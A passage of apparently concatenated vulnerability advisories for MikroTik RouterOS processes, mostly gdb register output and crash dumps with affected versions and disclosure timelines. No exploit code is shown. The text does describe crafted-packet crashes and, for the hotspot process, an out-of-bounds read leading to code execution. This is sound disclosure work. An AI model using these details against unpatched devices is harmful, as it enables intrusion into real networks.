2020.06.04-16:25:57.65@0:
2020.06.04-16:25:57.65@0: eip=0x0804c6d7 eflags=0x00010246
2020.06.04-16:25:57.65@0: edi=0x5ed9208c esi=0x00000000 ebp=0x7ffff3f8 esp=0x7ffff3b0
2020.06.04-16:25:57.65@0: eax=0x00000000 ebx=0x08051020 ecx=0x00000000 edx=0x00000000
2020.06.04-16:25:57.65@0:
2020.06.04-16:25:57.65@0: maps:
2020.06.04-16:25:57.65@0: 08048000-0804d000 r-xp 00000000 00:1a 14 /ram/pckg/advanced-tools/nova/bin/netwatch
2020.06.04-16:25:57.65@0: 77f41000-77f76000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.04-16:25:57.65@0: 77f7a000-77f94000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1
2020.06.04-16:25:57.65@0: 77f95000-77fa4000 r-xp 00000000 00:0c 944 /lib/libuc++.so
2020.06.04-16:25:57.65@0: 77fa5000-77ff1000 r-xp 00000000 00:0c 946 /lib/libumsg.so
2020.06.04-16:25:57.65@0: 77ff7000-77ffe000 r-xp 00000000
00:0c 958 /lib/ld-uClibc-0.9.33.2.so 61 | 2020.06.04-16:25:57.65@0: 62 | 2020.06.04-16:25:57.65@0: stack: 0x80000000 - 0x7ffff3b0 63 | 2020.06.04-16:25:57.65@0: d8 f4 ff 7f 80 f6 ff 7f 06 00 00 00 d0 f3 ff 7f 84 e5 04 08 0b 00 ff 08 e8 f3 ff 7f 06 00 00 00 64 | 2020.06.04-16:25:57.65@0: 20 10 05 08 e4 1a ff 77 f8 f3 ff 7f 22 2c fc 77 d8 f4 ff 7f 0b 00 ff 08 08 f4 ff 7f e4 1a ff 77 65 | 2020.06.04-16:25:57.65@0: 66 | 2020.06.04-16:25:57.65@0: code: 0x804c6d7 67 | 2020.06.04-16:25:57.65@0: f7 f6 8b 53 30 39 c2 73 6e 42 89 53 30 83 ec 0c 68 | ``` 69 | 70 | #### Affected Version 71 | 72 | This vulnerability was initially found in stable `6.46.2`, and was fixed in stable `6.47`. 73 | 74 | #### Timeline 75 | 76 | + 2020/04/20 - report the vulnerability to the vendor 77 | + 2020/06/02 - vendor fix it in stable `6.47` 78 | + 2021/05/04 - CVE is assigned 79 | 80 | 81 | 82 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20265/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2020-20265 2 | 3 | #### Description 4 | 5 | The `wireless` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `wireless` process due to invalid memory access. 6 | 7 | Against stable `6.46.5`, the poc resulted in the following crash captured by `gdb`. 8 | 9 | ```shell 10 | (gdb) c 11 | Continuing. 12 | 13 | Program received signal SIGSEGV, Segmentation fault. 14 | => 0x8070dbe: inc DWORD PTR ds:0x0 15 | 0x8070dc4: add esp,0x10 16 | 0x8070dc7: push ebx 17 | 0x8070dc8: mov eax,DWORD PTR [esi+0x8] 18 | 0x08070dbe in ?? 
() 19 | (gdb) i r 20 | eax 0x81164c4 135357636 21 | ecx 0x811814c 135364940 22 | edx 0x1 1 23 | ebx 0x776fcaf0 2003815152 24 | esp 0x7fc6dfd0 0x7fc6dfd0 25 | ebp 0x7fc6e008 0x7fc6e008 26 | esi 0x8130a58 135465560 27 | edi 0x7fc6e084 2143740036 28 | eip 0x8070dbe 0x8070dbe 29 | eflags 0x10202 [ IF RF ] 30 | cs 0x73 115 31 | ss 0x7b 123 32 | ds 0x7b 123 33 | es 0x7b 123 34 | fs 0x0 0 35 | gs 0x33 51 36 | (gdb) info inferiors 37 | Num Description Executable 38 | * 1 process 120 target:/ram/pckg/wireless/nova/bin/wireless 39 | ``` 40 | 41 | And the crash dump in `/rw/logs/backtrace.log` was: 42 | 43 | ```shell 44 | # cat /rw/logs/backtrace.log 45 | 2020.06.04-18:12:52.69@0: 46 | 2020.06.04-18:12:52.69@0: /ram/pckg/wireless/nova/bin/wireless 47 | 2020.06.04-18:12:52.69@0: --- signal=11 -------------------------------------------- 48 | 2020.06.04-18:12:52.69@0: 49 | 2020.06.04-18:12:52.69@0: eip=0x08070dbe eflags=0x00010202 50 | 2020.06.04-18:12:52.69@0: edi=0x7fc6e084 esi=0x08130a58 ebp=0x7fc6e008 esp=0x7fc6dfd0 51 | 2020.06.04-18:12:52.69@0: eax=0x081164c4 ebx=0x776fcaf0 ecx=0x0811814c edx=0x00000001 52 | 2020.06.04-18:12:52.69@0: 53 | 2020.06.04-18:12:52.69@0: maps: 54 | 2020.06.04-18:12:52.69@0: 08048000-08115000 r-xp 00000000 00:19 99 /ram/pckg/wireless/nova/bin/wireless 55 | 2020.06.04-18:12:52.69@0: 7749f000-774a1000 r-xp 00000000 00:0c 959 /lib/libdl-0.9.33.2.so 56 | 2020.06.04-18:12:52.69@0: 774a3000-774d8000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so 57 | 2020.06.04-18:12:52.69@0: 774dc000-774f6000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1 58 | 2020.06.04-18:12:52.69@0: 774f7000-77506000 r-xp 00000000 00:0c 944 /lib/libuc++.so 59 | 2020.06.04-18:12:52.69@0: 77507000-77664000 r-xp 00000000 00:0c 954 /lib/libcrypto.so.1.0.0 60 | 2020.06.04-18:12:52.69@0: 77674000-776bf000 r-xp 00000000 00:0c 956 /lib/libssl.so.1.0.0 61 | 2020.06.04-18:12:52.69@0: 776c3000-776cd000 r-xp 00000000 00:0c 961 /lib/libm-0.9.33.2.so 62 | 2020.06.04-18:12:52.69@0: 
776cf000-776ec000 r-xp 00000000 00:0c 947 /lib/libucrypto.so 63 | 2020.06.04-18:12:52.69@0: 776ed000-776f3000 r-xp 00000000 00:0c 951 /lib/liburadius.so 64 | 2020.06.04-18:12:52.69@0: 776f4000-776fc000 r-xp 00000000 00:0c 950 /lib/libubox.so 65 | 2020.06.04-18:12:52.69@0: 776fd000-77749000 r-xp 00000000 00:0c 946 /lib/libumsg.so 66 | 2020.06.04-18:12:52.69@0: 7774f000-77756000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 67 | 2020.06.04-18:12:52.69@0: 68 | 2020.06.04-18:12:52.69@0: stack: 0x7fc6f000 - 0x7fc6dfd0 69 | 2020.06.04-18:12:52.69@0: c4 64 11 08 07 c8 0f 08 f0 f0 10 08 f0 f0 10 08 28 fe 12 08 84 e0 c6 7f 08 e0 c6 7f 63 3d 06 08 70 | 2020.06.04-18:12:52.69@0: 0c 00 00 00 00 00 00 00 18 e0 c6 7f f0 ca 6f 77 58 0a 13 08 84 e0 c6 7f 38 e0 c6 7f 7c 7a 6f 77 71 | 2020.06.04-18:12:52.69@0: 72 | 2020.06.04-18:12:52.69@0: code: 0x8070dbe 73 | 2020.06.04-18:12:52.69@0: ff 05 00 00 00 00 83 c4 10 53 8b 46 08 0f b6 40 74 | ``` 75 | 76 | #### Affected Version 77 | 78 | This vulnerability was initially found in stable `6.46.3`, and was fixed in stable `6.47`. 79 | 80 | #### Timeline 81 | 82 | + 2020/04/08 - report the vulnerability to the vendor 83 | + 2020/06/02 - vendor fix it in stable `6.47` 84 | + 2021/05/04 - CVE is assigned 85 | 86 | 87 | 88 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20266/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2020-20266 2 | 3 | #### Description 4 | 5 | The `dot1x` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `dot1x` process due to NULL pointer dereference. 6 | 7 | Against stable `6.46.5`, the poc resulted in the following crash captured by `gdb`. 8 | 9 | ```shell 10 | (gdb) c 11 | Continuing. 12 | 13 | Program received signal SIGSEGV, Segmentation fault. 
14 | => 0x776a51e5 <_ZN6string6assignERKS_+23>: mov edx,DWORD PTR [eax] 15 | 0x776a51e7 <_ZN6string6assignERKS_+25>: add edx,eax 16 | 0x776a51e9 <_ZN6string6assignERKS_+27>: add edx,0x4 17 | 0x776a51ec <_ZN6string6assignERKS_+30>: push edx 18 | 0x776a51e5 in string::assign(string const&) () from target:/lib/libuc++.so 19 | (gdb) i r 20 | eax 0x0 0 21 | ecx 0x0 0 22 | edx 0x8062e28 134622760 23 | ebx 0x776ad4ec 2003490028 24 | esp 0x7fc50f6c 0x7fc50f6c 25 | ebp 0x7fc50f78 0x7fc50f78 26 | esi 0x8062ed0 134622928 27 | edi 0x7fc51064 2143621220 28 | eip 0x776a51e5 0x776a51e5 29 | eflags 0x10202 [ IF RF ] 30 | cs 0x73 115 31 | ss 0x7b 123 32 | ds 0x7b 123 33 | es 0x7b 123 34 | fs 0x0 0 35 | gs 0x33 51 36 | (gdb) info inferiors 37 | Num Description Executable 38 | * 1 process 197 target:/nova/bin/dot1x 39 | ``` 40 | 41 | And the crash dump in `/rw/logs/backtrace.log` was: 42 | 43 | ```shell 44 | # cat /rw/logs/backtrace.log 45 | 2020.06.04-14:51:29.47@0: 46 | 2020.06.04-14:51:29.47@0: 47 | 2020.06.04-14:51:29.81@0: /nova/bin/dot1x 48 | 2020.06.04-14:51:29.81@0: --- signal=11 -------------------------------------------- 49 | 2020.06.04-14:51:29.81@0: 50 | 2020.06.04-14:51:29.81@0: eip=0x776a51e5 eflags=0x00010202 51 | 2020.06.04-14:51:29.81@0: edi=0x7fc51064 esi=0x08062ed0 ebp=0x7fc50f78 esp=0x7fc50f6c 52 | 2020.06.04-14:51:29.81@0: eax=0x00000000 ebx=0x776ad4ec ecx=0x00000000 edx=0x08062e28 53 | 2020.06.04-14:51:29.81@0: 54 | 2020.06.04-14:51:29.81@0: maps: 55 | 2020.06.04-14:51:29.81@0: 08048000-0805f000 r-xp 00000000 00:0c 1064 /nova/bin/dot1x 56 | 2020.06.04-14:51:29.81@0: 7764a000-7767f000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so 57 | 2020.06.04-14:51:29.81@0: 77683000-7769d000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1 58 | 2020.06.04-14:51:29.81@0: 7769e000-776ad000 r-xp 00000000 00:0c 944 /lib/libuc++.so 59 | 2020.06.04-14:51:29.81@0: 776ae000-776b4000 r-xp 00000000 00:0c 951 /lib/liburadius.so 60 | 2020.06.04-14:51:29.81@0: 776b5000-776bd000 r-xp 
00000000 00:0c 950 /lib/libubox.so 61 | 2020.06.04-14:51:29.81@0: 776be000-776db000 r-xp 00000000 00:0c 947 /lib/libucrypto.so 62 | 2020.06.04-14:51:29.81@0: 776dc000-77728000 r-xp 00000000 00:0c 946 /lib/libumsg.so 63 | 2020.06.04-14:51:29.81@0: 7772e000-77735000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 64 | 2020.06.04-14:51:29.81@0: 65 | 2020.06.04-14:51:29.81@0: stack: 0x7fc52000 - 0x7fc50f6c 66 | 2020.06.04-14:51:29.81@0: 00 00 00 00 90 27 06 08 e4 8a 72 77 a8 0f c5 7f 2e be 6f 77 90 27 06 08 d0 2e 06 08 28 2e 06 08 67 | 2020.06.04-14:51:29.81@0: 28 2e 06 08 a4 0f c5 7f f0 da 6b 77 05 00 00 00 f0 da 6b 77 e0 2d 06 08 64 10 c5 7f e8 0f c5 7f 68 | 2020.06.04-14:51:29.81@0: 69 | 2020.06.04-14:51:29.81@0: code: 0x776a51e5 70 | 2020.06.04-14:51:29.81@0: 8b 10 01 c2 83 c2 04 52 83 c0 04 50 ff 75 08 e8 71 | ``` 72 | 73 | #### Affected Version 74 | 75 | This vulnerability was initially found in stable `6.46.3`, and was fixed in stable `6.47`. 76 | 77 | #### Timeline 78 | 79 | + 2020/04/20 - report the vulnerability to the vendor 80 | + 2020/06/02 - vendor fix it in stable `6.47` 81 | + 2021/05/04 - CVE is assigned 82 | 83 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2020-20267/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2020-20267 2 | 3 | #### Description 4 | 5 | The `resolver` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `resolver` process due to invalid memory access. 6 | 7 | Against stable `6.46.5`, the poc resulted in the following crash captured by `gdb`. 8 | 9 | ```shell 10 | (gdb) c 11 | Continuing. 12 | 13 | Program received signal SIGSEGV, Segmentation fault. 14 | => 0x80508f6: mov BYTE PTR [eax],dl 15 | 0x80508f8: mov eax,DWORD PTR [ebx+0x14] 16 | 0x80508fb: inc eax 17 | 0x80508fc: mov DWORD PTR [ebx+0x14],eax 18 | 0x080508f6 in ?? 
() 19 | (gdb) i r 20 | eax 0xc 12 21 | ecx 0x77676f00 2003267328 22 | edx 0x5 5 23 | ebx 0x8061c98 134618264 24 | esp 0x7fe5fcc0 0x7fe5fcc0 25 | ebp 0x7fe5fd08 0x7fe5fd08 26 | esi 0x8062018 134619160 27 | edi 0x8060620 134612512 28 | eip 0x80508f6 0x80508f6 29 | eflags 0x10206 [ PF IF RF ] 30 | cs 0x73 115 31 | ss 0x7b 123 32 | ds 0x7b 123 33 | es 0x7b 123 34 | fs 0x0 0 35 | gs 0x33 51 36 | (gdb) info inferiors 37 | Num Description Executable 38 | * 1 process 197 target:/nova/bin/resolver 39 | ``` 40 | 41 | And the crash dump in `/rw/logs/backtrace.log` was: 42 | 43 | ```shell 44 | # cat /rw/logs/backtrace.log 45 | 2020.06.18-14:38:03.27@0: 46 | 2020.06.18-14:38:03.27@0: 47 | 2020.06.18-14:38:03.28@0: /nova/bin/resolver 48 | 2020.06.18-14:38:03.28@0: --- signal=11 -------------------------------------------- 49 | 2020.06.18-14:38:03.28@0: 50 | 2020.06.18-14:38:03.28@0: eip=0x080508f6 eflags=0x00010206 51 | 2020.06.18-14:38:03.28@0: edi=0x08060620 esi=0x08062018 ebp=0x7fe5fd08 esp=0x7fe5fcc0 52 | 2020.06.18-14:38:03.28@0: eax=0x0000000c ebx=0x08061c98 ecx=0x77676f00 edx=0x00000005 53 | 2020.06.18-14:38:03.28@0: 54 | 2020.06.18-14:38:03.28@0: maps: 55 | 2020.06.18-14:38:03.28@0: 08048000-0805c000 r-xp 00000000 00:0c 995 /nova/bin/resolver 56 | 2020.06.18-14:38:03.28@0: 7763f000-77674000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so 57 | 2020.06.18-14:38:03.28@0: 77678000-77692000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1 58 | 2020.06.18-14:38:03.28@0: 77693000-776a2000 r-xp 00000000 00:0c 944 /lib/libuc++.so 59 | 2020.06.18-14:38:03.28@0: 776a3000-776ab000 r-xp 00000000 00:0c 950 /lib/libubox.so 60 | 2020.06.18-14:38:03.28@0: 776ac000-776f8000 r-xp 00000000 00:0c 946 /lib/libumsg.so 61 | 2020.06.18-14:38:03.28@0: 776fe000-77705000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 62 | 2020.06.18-14:38:03.28@0: 63 | 2020.06.18-14:38:03.28@0: stack: 0x7fe60000 - 0x7fe5fcc0 64 | 2020.06.18-14:38:03.28@0: 03 00 00 00 e4 8a 6f 77 38 fd e5 7f e4 fc e5 7f c0 dc 05 08 
5c 03 e6 7f 08 fd e5 7f 1f e7 04 08 65 | 2020.06.18-14:38:03.28@0: 58 21 06 08 48 06 06 08 f8 1f 06 08 c0 0c 00 00 1c fd e5 7f 28 c7 05 08 02 fb 6f 77 98 1c 06 08 66 | 2020.06.18-14:38:03.28@0: 67 | 2020.06.18-14:38:03.28@0: code: 0x80508f6 68 | 2020.06.18-14:38:03.28@0: 88 10 8b 43 14 40 89 43 14 8b 55 dc 8d 72 04 8b 69 | ``` 70 | 71 | #### Affected Version 72 | 73 | This vulnerability was initially found in long-term `6.44.6`, and was fixed in stable `6.47`. 74 | 75 | #### Timeline 76 | 77 | + 2020/01/06 - reported the vulnerability to the vendor 78 | + 2020/01/07 - the vendor confirmed the vulnerability 79 | + 2020/06/02 - the vendor fixed it in stable `6.47` 80 | + 2021/05/04 - CVE was assigned 81 | 82 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2021-36613/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2021-36613 2 | 3 | #### Description 4 | 5 | The `ptp` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `ptp` process due to NULL pointer dereference. 6 | 7 | Against stable `6.48.1`, the poc resulted in the following crash dump. 
8 | 9 | ```shell 10 | # cat /rw/logs/backtrace.log 11 | 2021.02.08-12:13:09.33@0: 12 | 2021.02.08-12:13:09.33@0: /nova/bin/ptp 13 | 2021.02.08-12:13:09.33@0: --- signal=11 -------------------------------------------- 14 | 2021.02.08-12:13:09.33@0: 15 | 2021.02.08-12:13:09.33@0: eip=0x08050abb eflags=0x00010202 16 | 2021.02.08-12:13:09.33@0: edi=0x7fd5ee94 esi=0x0805be48 ebp=0x7fd5ee18 esp=0x7fd5ee18 17 | 2021.02.08-12:13:09.33@0: eax=0x00000000 ebx=0x776f5b40 ecx=0x0805c6a8 edx=0x00000001 18 | 2021.02.08-12:13:09.33@0: 19 | 2021.02.08-12:13:09.33@0: maps: 20 | 2021.02.08-12:13:09.33@0: 08048000-08058000 r-xp 00000000 00:0c 1067 /nova/bin/ptp 21 | 2021.02.08-12:13:09.33@0: 7767d000-776b2000 r-xp 00000000 00:0c 966 /lib/libuClibc-0.9.33.2.so 22 | 2021.02.08-12:13:09.33@0: 776b6000-776d0000 r-xp 00000000 00:0c 962 /lib/libgcc_s.so.1 23 | 2021.02.08-12:13:09.33@0: 776d1000-776e0000 r-xp 00000000 00:0c 945 /lib/libuc++.so 24 | 2021.02.08-12:13:09.33@0: 776e1000-776eb000 r-xp 00000000 00:0c 963 /lib/libm-0.9.33.2.so 25 | 2021.02.08-12:13:09.33@0: 776ed000-776f5000 r-xp 00000000 00:0c 951 /lib/libubox.so 26 | 2021.02.08-12:13:09.33@0: 776f6000-77742000 r-xp 00000000 00:0c 947 /lib/libumsg.so 27 | 2021.02.08-12:13:09.33@0: 77748000-7774f000 r-xp 00000000 00:0c 960 /lib/ld-uClibc-0.9.33.2.so 28 | 2021.02.08-12:13:09.33@0: 29 | 2021.02.08-12:13:09.33@0: stack: 0x7fd5f000 - 0x7fd5ee18 30 | 2021.02.08-12:13:09.33@0: 48 ee d5 7f 7c 0a 6f 77 48 be 05 08 94 ee d5 7f 05 00 00 00 86 3c 71 77 f8 ef d5 7f 0c 00 fe 08 31 | 2021.02.08-12:13:09.33@0: 58 ee d5 7f 40 5b 6f 77 a0 f1 d5 7f 94 ee d5 7f b8 ee d5 7f 16 41 6f 77 94 ee d5 7f a0 f1 d5 7f 32 | 2021.02.08-12:13:09.33@0: 33 | 2021.02.08-12:13:09.33@0: code: 0x8050abb 34 | 2021.02.08-12:13:09.33@0: 8b 10 89 45 08 8b 42 18 5d ff e0 55 89 e5 31 c0 35 | ``` 36 | 37 | #### Affected Version 38 | 39 | This vulnerability was initially found in stable `6.48.1`, and was fixed in stable `6.48.2`. 
40 | 41 | #### Timeline 42 | 43 | + 2021/03/01 - reported the vulnerability to the vendor 44 | + 2021/03/18 - the vendor reproduced and confirmed the vulnerability 45 | + 2021/06/01 - the vendor responded that it was fixed in stable `6.48.2` 46 | + 2022/05/12 - CVE was assigned 47 | 48 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2021-36614/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2021-36614 2 | 3 | #### Description 4 | 5 | The `tr069-client` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `tr069-client` process due to NULL pointer dereference. 6 | 7 | Against stable `6.47`, the poc resulted in the following crash captured by `gdb`. 8 | 9 | ```shell 10 | (gdb) c 11 | Continuing. 12 | 13 | Program received signal SIGSEGV, Segmentation fault. 14 | => 0x805a185: push DWORD PTR [eax] 15 | 0x805a187: push 0x1 16 | 0x805a189: push esi 17 | 0x805a18a: call 0x804eb10 <_ZN2nv7message6insertINS_6u32_idEEEvT_NS_8IdTraitsIS3_E8set_typeE@plt> 18 | 0x0805a185 in ?? 
() 19 | (gdb) i r 20 | eax 0x0 0 21 | ecx 0x776924ec 2003379436 22 | edx 0x7769187c 2003376252 23 | ebx 0x80a9290 134910608 24 | esp 0x7ff7497c 0x7ff7497c 25 | ebp 0x7ff74988 0x7ff74988 26 | esi 0x7ff74a04 2146912772 27 | edi 0x7ff74a04 2146912772 28 | eip 0x805a185 0x805a185 29 | eflags 0x10206 [ PF IF RF ] 30 | cs 0x73 115 31 | ss 0x7b 123 32 | ds 0x7b 123 33 | es 0x7b 123 34 | fs 0x0 0 35 | gs 0x33 51 36 | (gdb) info inferiors 37 | Num Description Executable 38 | * 1 process 198 target:/ram/pckg/tr069-client/nova/bin/tr069-client 39 | ``` 40 | 41 | And the crash dump in `/rw/logs/backtrace.log` was: 42 | 43 | ```shell 44 | # cat /rw/logs/backtrace.log 45 | 2020.06.10-17:04:17.63@0: 46 | 2020.06.10-17:04:17.63@0: 47 | 2020.06.10-17:04:17.63@0: /ram/pckg/tr069-client/nova/bin/tr069-client 48 | 2020.06.10-17:04:17.63@0: --- signal=11 -------------------------------------------- 49 | 2020.06.10-17:04:17.63@0: 50 | 2020.06.10-17:04:17.63@0: eip=0x0805a185 eflags=0x00010206 51 | 2020.06.10-17:04:17.63@0: edi=0x7ff74a04 esi=0x7ff74a04 ebp=0x7ff74988 esp=0x7ff7497c 52 | 2020.06.10-17:04:17.63@0: eax=0x00000000 ebx=0x080a9290 ecx=0x776924ec edx=0x7769187c 53 | 2020.06.10-17:04:17.63@0: 54 | 2020.06.10-17:04:17.63@0: maps: 55 | 2020.06.10-17:04:17.63@0: 08048000-08096000 r-xp 00000000 00:10 13 /ram/pckg/tr069-client/nova/bin/tr069-client 56 | 2020.06.10-17:04:17.63@0: 7762f000-77664000 r-xp 00000000 00:0c 966 /lib/libuClibc-0.9.33.2.so 57 | 2020.06.10-17:04:17.63@0: 77668000-77682000 r-xp 00000000 00:0c 962 /lib/libgcc_s.so.1 58 | 2020.06.10-17:04:17.63@0: 77683000-77692000 r-xp 00000000 00:0c 945 /lib/libuc++.so 59 | 2020.06.10-17:04:17.63@0: 77693000-7769d000 r-xp 00000000 00:0c 963 /lib/libm-0.9.33.2.so 60 | 2020.06.10-17:04:17.63@0: 7769f000-776bc000 r-xp 00000000 00:0c 948 /lib/libucrypto.so 61 | 2020.06.10-17:04:17.63@0: 776bd000-776c0000 r-xp 00000000 00:0c 954 /lib/libxml.so 62 | 2020.06.10-17:04:17.63@0: 776c1000-7770d000 r-xp 00000000 00:0c 947 /lib/libumsg.so 
63 | 2020.06.10-17:04:17.63@0: 77710000-7771b000 r-xp 00000000 00:0c 955 /lib/libuhttp.so 64 | 2020.06.10-17:04:17.63@0: 7771c000-77724000 r-xp 00000000 00:0c 951 /lib/libubox.so 65 | 2020.06.10-17:04:17.63@0: 77728000-7772f000 r-xp 00000000 00:0c 960 /lib/ld-uClibc-0.9.33.2.so 66 | 2020.06.10-17:04:17.63@0: 67 | 2020.06.10-17:04:17.63@0: stack: 0x7ff75000 - 0x7ff7497c 68 | 2020.06.10-17:04:17.63@0: 10 a0 08 08 40 4b 72 77 90 92 0a 08 b8 49 f7 7f 7c fa 71 77 90 92 0a 08 04 4a f7 7f 05 00 00 00 69 | 2020.06.10-17:04:17.63@0: 28 4a f7 7f b4 49 f7 7f 40 4b 72 77 88 5b 09 08 40 4b 72 77 80 4d f7 7f 04 4a f7 7f 28 4a f7 7f 70 | 2020.06.10-17:04:17.63@0: 71 | 2020.06.10-17:04:17.63@0: code: 0x805a185 72 | 2020.06.10-17:04:17.63@0: ff 30 6a 01 56 e8 81 49 ff ff 83 c4 0c ff 73 24 73 | 2020.06.10-17:04:17.63@0 74 | ``` 75 | 76 | #### Affected Version 77 | 78 | This vulnerability was initially found in stable `6.47`, and was fixed in stable `6.48.2`. 79 | 80 | #### Timeline 81 | 82 | + 2021/03/01 - reported the vulnerability to the vendor 83 | + 2021/03/18 - the vendor reproduced and confirmed the vulnerability 84 | + 2021/06/01 - the vendor responded that it was fixed in stable `6.48.2` 85 | + 2022/05/12 - CVE was assigned 86 | 87 | 88 | 89 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2022-36522/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2022-36522 2 | 3 | #### Description 4 | 5 | The `netwatch` process suffers from an assertion failure vulnerability. There is a reachable assertion in the `netwatch` process: by sending a crafted packet, an authenticated remote user can crash the `netwatch` process due to the assertion failure. 6 | 7 | Against stable `6.47`, the poc resulted in the following crash dump. 
8 | 9 | ```shell 10 | # cat /rw/logs/backtrace.log 11 | 2020.06.29-14:27:25.52@0: 12 | 2020.06.29-14:27:25.52@0: 13 | 2020.06.29-14:27:25.52@0: /ram/pckg/advanced-tools/nova/bin/netwatch 14 | 2020.06.29-14:27:25.52@0: --- signal=6 -------------------------------------------- 15 | 2020.06.29-14:27:25.52@0: 16 | 2020.06.29-14:27:25.52@0: eip=0x776b855b eflags=0x00000246 17 | 2020.06.29-14:27:25.52@0: edi=0xffffffff esi=0x776c0200 ebp=0x7feea6a0 esp=0x7feea698 18 | 2020.06.29-14:27:25.52@0: eax=0x00000000 ebx=0x000000b8 ecx=0x000000b8 edx=0x00000006 19 | 2020.06.29-14:27:25.52@0: 20 | 2020.06.29-14:27:25.52@0: maps: 21 | 2020.06.29-14:27:25.52@0: 08048000-0804d000 r-xp 00000000 00:10 14 /ram/pckg/advanced-tools/nova/bin/netwatch 22 | 2020.06.29-14:27:25.52@0: 7768a000-776bf000 r-xp 00000000 00:0c 966 /lib/libuClibc-0.9.33.2.so 23 | 2020.06.29-14:27:25.52@0: 776c3000-776dd000 r-xp 00000000 00:0c 962 /lib/libgcc_s.so.1 24 | 2020.06.29-14:27:25.52@0: 776de000-776ed000 r-xp 00000000 00:0c 945 /lib/libuc++.so 25 | 2020.06.29-14:27:25.52@0: 776ee000-7773a000 r-xp 00000000 00:0c 947 /lib/libumsg.so 26 | 2020.06.29-14:27:25.52@0: 77740000-77747000 r-xp 00000000 00:0c 960 /lib/ld-uClibc-0.9.33.2.so 27 | 2020.06.29-14:27:25.52@0: 28 | 2020.06.29-14:27:25.52@0: stack: 0x7feeb000 - 0x7feea698 29 | 2020.06.29-14:27:25.52@0: 00 00 6c 77 00 00 6c 77 d8 a6 ee 7f 77 40 6b 77 06 00 00 00 00 02 6c 77 20 00 00 00 00 00 00 00 30 | 2020.06.29-14:27:25.52@0: bc b0 ee 7f 38 a7 ee 7f d4 a6 ee 7f f4 aa 73 77 b8 a6 ee 7f f4 aa 73 77 bc b0 ee 7f ff ff ff ff 31 | 2020.06.29-14:27:25.52@0: 32 | 2020.06.29-14:27:25.52@0: code: 0x776b855b 33 | 2020.06.29-14:27:25.52@0: 5b 3d 00 f0 ff ff 76 0e 8b 93 cc ff ff ff f7 d8 34 | ``` 35 | 36 | #### Affected Version 37 | 38 | This vulnerability was initially found in stable `6.46.2`; stable `6.48.3` was also affected. When tested against the latest stable version `6.49.6`, it turned out that this vulnerability had been fixed. 
39 | 40 | #### Timeline 41 | 42 | + 2021/03/01 - reported the vulnerability to the vendor 43 | + 2021/03/18 - vendor reproduced and confirmed the vulnerability 44 | + 2022/08/27 - CVE was assigned 45 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2022-45313/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2022-45313 2 | 3 | #### Description 4 | 5 | The `hotspot` process suffers from an out-of-bounds read vulnerability. Due to a lack of proper validation, by sending a crafted nova message with a specific u32_id key holding a negative value, it's possible to cause an out-of-bounds read, which may subsequently affect the function pointer of an indirect call. This makes it possible for an authenticated user to achieve code execution. 6 | > The authentication here means that the user should be authenticated to the device itself (e.g. web, winbox). 7 | 8 | Against stable `6.46.5`, the poc resulted in the following crash captured by `gdb`. 9 | 10 | ```shell 11 | (gdb) c 12 | Continuing. 13 | 14 | Program received signal SIGSEGV, Segmentation fault. 15 | => 0x65737520: Error while running hook_stop: 16 | Cannot access memory at address 0x65737520 17 | 0x65737520 in ?? 
() 18 | (gdb) i r 19 | eax 0x7fad0fb4 2142048180 20 | ecx 0x0 0 21 | edx 0x65737520 1702065440 22 | ebx 0x6d7ae08a 1836769418 23 | esp 0x7fad0f5c 0x7fad0f5c 24 | ebp 0x7fad0fd8 0x7fad0fd8 25 | esi 0xffffffec -20 26 | edi 0xffffffff -1 27 | eip 0x65737520 0x65737520 28 | eflags 0x10202 [ IF RF ] 29 | cs 0x73 115 30 | ss 0x7b 123 31 | ds 0x7b 123 32 | es 0x7b 123 33 | fs 0x0 0 34 | gs 0x33 51 35 | (gdb) info inferiors 36 | Num Description Executable 37 | * 1 process 201 target:/ram/pckg/hotspot/nova/bin/hotspot 38 | ``` 39 | 40 | And the crash dump in `/rw/logs/backtrace.log` was: 41 | 42 | ```shell 43 | # cat /rw/logs/backtrace.log 44 | 2020.06.22-15:04:20.55@0: 45 | 2020.06.22-15:04:20.55@0: 46 | 2020.06.22-15:04:20.55@0: /ram/pckg/hotspot/nova/bin/hotspot 47 | 2020.06.22-15:04:20.55@0: --- signal=11 -------------------------------------------- 48 | 2020.06.22-15:04:20.55@0: 49 | 2020.06.22-15:04:20.55@0: eip=0x65737520 eflags=0x00010202 50 | 2020.06.22-15:04:20.55@0: edi=0xffffffff esi=0xffffffec ebp=0x7fad0fd8 esp=0x7fad0f5c 51 | 2020.06.22-15:04:20.55@0: eax=0x7fad0fb4 ebx=0x6d7ae08a ecx=0x00000000 edx=0x65737520 52 | 2020.06.22-15:04:20.55@0: 53 | 2020.06.22-15:04:20.55@0: maps: 54 | 2020.06.22-15:04:20.55@0: 08048000-08078000 r-xp 